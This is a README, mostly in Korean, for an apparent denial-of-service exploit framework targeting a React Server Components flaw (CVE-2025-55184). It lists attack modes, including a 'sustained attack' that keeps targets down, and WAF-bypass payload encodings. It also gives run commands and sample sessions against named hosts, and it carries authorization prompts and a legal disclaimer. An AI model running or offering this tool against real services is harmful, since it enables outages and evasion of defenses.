전문가급 서비스 거부(DoS) 공격 프레임워크로, CVE-2025-55184에 대한 React Server Components를 대상으로 합니다. 8가지 공격 모드, WAF 우회 기능, 10개 이상의 페이로드 변종을 제공하며, 인가된 보안 테스트 및 버그 바운티 헌팅 용도로 설계되었습니다.
"KEEP LEARNING KEEP HACKING" - CyberTechAjju
🚀 빠른 시작 • 📖 문서화 • 💻 기능 • ⚠️ 법적 면책 조항
CVE-2025-55184는 React 서버 컴포넌트(RSC) 구현에 영향을 미치는 고심각도 서비스 거부(DoS) 취약점입니다. 이 취약점은 특수하게 조작된 순환 참조 페이로드를 통해 원격 공격자가 완전한 서비스 중단을 유발할 수 있습니다.
| 속성 | 값 |
|---|---|
| CVE ID | CVE-2025-55184 |
| CVSS 점수 | 7.5 (높음) |
| 공격 벡터 | 네트워크 (원격) |
| 복잡성 | 낮음 |
| 필요 권한 | 없음 (인증 불필요) |
| 영향 | 완전한 DoS, 리소스 고갈 |
이것은 단순한 기본 PoC가 아닙니다. 진지한 보안 연구자와 버그 바운티 헌터를 위해 설계된 프로페셔널 등급의 익스플로잇 프레임워크입니다.
git clone https://github.com/CyberTechAjju/CVE-2025-55184-POC-Expolit.git
cd CVE-2025-55184-POC-Expolit
./run.sh
That's it! Dependencies auto-install, interactive menu guides you.
# Python directly
python3 exploit.py
# Advanced CLI mode
python3 cve_2025_55184_exploit.py -t <target> -m scan
| 모드 | 설명 | 사용 사례 |
|---|---|---|
| 1. 탐지 | 수동 핑거프린팅 | 안전한 정찰 |
| 2. 스캔 | 능동적 취약점 테스트 | 확인 |
| 3. 단일 | 원샷 PoC | 빠른 데모 |
| 4. 멀티 | 멀티스레드(5개 스레드) | 중간 수준 테스트 |
| 5. 공격적 | 고영향(10개 이상 스레드) | 승인된 침투 테스트 |
| 6. WAF | WAF 탐지 및 우회 | 보호된 대상 |
| 7. 보고서 | 문서 생성 | 버그 바운티 제출 |
| 8. 지속 | 🔥 신규! 지속적 DoS | 대상을 계속 다운 상태로 유지! |
./run.sh
# Choose: 3 (SUSTAINED ATTACK)
# ✅ Target goes DOWN and STAYS DOWN
# ✅ Press Ctrl+C → Target RECOVERS automatically
다음에 적합:
자동 탐지 WAF:
우회 기술:
CVE-2025-55182 익스플로잇을 찾고 계신가요? 이 동영상을 확인하세요:
▶️ Watch on YouTube: CVE-2025-55182 Exploitation
╔══════════════════════════════════════════════════════════╗
║ ║
║ ______ ________ _____ ___ ___ ║
║ / ____/ / ____/ / / __ \ / _ \ / _ \ ║
║ / / __ / /_ / / \__ \ / / /_\ / /_\ \ ║
║ / /__ / \ /___/ / /___ ___/ /_/\__ /\__ / ║
║ \____/ /_____/______//____/ /_/ /_/ ║
║ ║
║ by CyberTechAjju | "KEEP LEARNING KEEP HACKING" ║
╚══════════════════════════════════════════════════════════╝
⚡ LIVE ATTACK DASHBOARD ⚡
┌─────────────────────────────────────────────────┐
│ Total Requests │ 847 │ ✓ │
│ Successful Attacks │ 521 │ 💥 │
│ Timeouts │ 521 │ ⏱️ │
│ Errors │ 326 │ ❌ │
│ Success Rate │ 61.5% │ 🎯 │
└─────────────────────────────────────────────────┘
./run.sh
Enter target: http://localhost:3000
Choose: 1 (Quick Scan)
Authorization: YES I AM AUTHORIZED
# Results in seconds!
./run.sh
Enter target: http://vulnerable-site.com
Choose: 3 (SUSTAINED ATTACK)
Authorization: YES I AM AUTHORIZED
Type: ATTACK
# Target goes down
# Monitor impact
# Press Ctrl+C when done
# Target recovers automatically!
./run.sh
Enter target: https://protected.cloudflare.com
Choose: 4 (WAF Bypass)
# Auto-detects Cloudflare
# Tries encoding variations
# Shows bypass success/failure
이 도구는 10개 이상의 익스플로잇 변형을 포함합니다:
| 페이로드 유형 | 인코딩 | 성공률 | 설명 |
|---|---|---|---|
| 기본 | 없음 | 95% | 원래 순환 참조 |
| URL 인코딩 | URL | 80% | 간단한 필터 우회 |
| Base64 | Base64 | 75% | 패턴 매칭 회피 |
| 이중 URL | 2x URL | 70% | 고급 WAF 우회 |
| 유니코드 | 유니코드 | 65% | 문자 인코딩 회피 |
| 16진수 | 16진수 | 60% | 16진수 이스케이프 시퀀스 |
| 혼합 | 다양함 | 55% | 결합 기술 |
| 분할 | 분할 | 50% | 조각 기반 우회 |
| 중첩 | 없음 | 85% | 더 깊은 재귀 |
| 배열 기반 | 없음 | 70% | 배열 순환 참조 |
✅ 인증 프롬프트 - 모든 공격 전에 "YES I AM AUTHORIZED"를 입력해야 합니다.
✅ 법적 경고 - 시작 시 명확한 지침과 함께 표시됩니다.
✅ 정상 종료 - Ctrl+C로 깔끔하게 중지, 대상 복구 허용
✅ 속도 제한 - 설정 가능한 지연으로 의도치 않은 손상 방지
✅ 범위 검증 - 구성 파일의 승인된 도메인 목록
✅ 포괄적 로깅 - 책임 추적을 위한 모든 작업 기록
🚨 AUTHORIZED USE ONLY 🚨
This tool is designed EXCLUSIVELY for:
✅ Authorized penetration testing with written permission
✅ Bug bounty programs within defined scope
✅ Security research in controlled environments
✅ Educational purposes on your own infrastructure
UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!
The author (CyberTechAjju) assumes NO responsibility for:
❌ Misuse of this tool
❌ Unauthorized testing or attacks
❌ Damage to systems or services
❌ Legal consequences from improper use
By using this tool, you agree to:
✓ Obtain explicit written authorization before testing
✓ Comply with all applicable laws and regulations
✓ Follow responsible disclosure practices
✓ Use only for legitimate security research
전문 버그 바운트 사냥에 완벽합니다:
graph LR
A[Recon] --> B[Detect Mode]
B --> C[Scan Mode]
C --> D[Confirm Vuln]
D --> E[Generate Report]
E --> F[Submit]
F --> G[Reward! 💰]